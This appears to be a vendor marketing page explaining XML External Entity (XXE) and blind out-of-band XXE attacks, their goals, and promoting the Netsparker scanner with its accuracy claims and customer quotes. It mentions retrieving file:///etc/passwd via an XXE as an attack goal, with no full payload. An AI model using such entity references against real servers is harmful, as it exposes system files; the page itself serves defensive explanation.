Why You Need to Scan For XXE Flaws

Many web applications use XML to store and access data. XXE is a vulnerability in XML documents that is as dangerous as Cross-site Scripting vulnerabilities. The good thing is that you can detect it with an automated solution such as Netsparker.

Get a Demo

Though perhaps not as well-known as other issues like cross-site scripting (XSS), cross-site request forgery (CSRF), and injection vulnerabilities, an XML External Entity attack (XXE) can be just as damaging. In fact even OWASP has recognized this attack vector, and added it to its Top 10 list of web application vulnerabilities as of 2017. As part of your web application security program, you do need to know what XXE is, how it can affect your environment, and how you can protect your websites from XXE attacks.

What Is XXE?

XXE takes advantage of a web application that has an XML parser that makes requests to other external XML documents, a functionality that is enabled by default in many popular XML parsers. In a traditional XXE attack, the hacker tricks the victim into clicking a link that triggers the system to execute the malicious XML file the hacker has written. If the application is vulnerable, it parses that XML and follows the instructions in the definitions and markup that it parsed.

Those instructions can be as varied as any web application vulnerability that allows an attacker to run arbitrary commands or code. As stated in the 2017 OWASP Top 10, "External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks."

The OOB-XXE Variant

There is another variation called an out-of-band XML external entity (OOB-XXE) attack, or blind XXE, which is a kind of server-side request forgery (SSRF) vulnerability. In this, an attacker does not get the file or response directly from the target web server. Instead, they send XML input that creates a file and then coerces the target server to make an HTTP request to a separate server controlled by the attacker. Then, the attacker can retrieve the data from their own server.

What Is At Stake?

The consequences of XXE can be far-reaching. Depending on the web application and the nature of the vulnerability, a broad range of sensitive data can be at risk of compromise in an XXE attack.

Examples for goals for XXE attacks can include:

  • Viewing the etc/passwd file in order to enumerate users and potentially crack poorly encrypted passwords by trying to retrieve the file via commands such as file:///etc/passwd
  • Denial of service, as a result of instructions in the parsed XML that exhaust the available memory.
  • Port scanning on the internal network, in order to map out IP addresses on the network and identify servers and services hosted behind the web server.

As with most attacks, the targets are limited only by the attacker's resourcefulness and patience, and the data behind your vulnerable web application.

Identifying XXE Flaws

The first step to ensuring your web applications are not vulnerable to a XXE attack is to identify any of your business's applications that are vulnerable to it. To do so you need a web application security scanner that reliably identifies a full range of vulnerabilities, without hiding these critical and useful results behind a mountain of false positives. You need Netsparker.

No matter what platforms your web applications is built with and runs on, Netsparker can scan them and identify the full spectrum of both server-side and client-side vulnerabilities.

Netsparker is also the most accurate web application vulnerability scanner on the market, as proven when independent security tool tester Shay Chen tested the most popular web application scanners, both commercial and open source. The benchmark was designed to reflect real technologies and vulnerabilities in the modern threat landscape. Only Netsparker found 100% of the vulnerabilities in the test, and it did so without reporting any false positives.

Netsparker is the only tool with Proof-Based Scanning™. Every finding in our web security scan reports comes with proof of exploit: you see exactly what HTTP requests triggered the vulnerability, and what information was compromised as a result. Your security team easily sees the vulnerabilities and their impact, and no longer have to spend hours or days validating false positives. And, if you develop your own applications, software developers can easily isolate what part of the business logic is flawed and exploitable. These dead accurate results streamline every step of the web application security process.

Try Netsparker Today

Contact us today to begin your 15-day free trial of the Netsparker Web Application Security Scanner. See how easy we can make it to identify web security issues, including XXE vulnerabilities. And, see how much easier maintaining a secure web presence can be when your scanner is giving you the most comprehensive and thorough results on the market.

What our customers are saying

"I had the opportunity to compare external expertise reports with Netsparker ones. Netsparker was better, finding more breaches. It’s a very good product for me."
"As opposed to other web application scanners, Netsparker is very easy to use. An out of the box installation can detect more vulnerabilities than any other scanner."
"We chose Netsparker because it is more tailored to web application security and has features that allow the university to augment its web application security needs."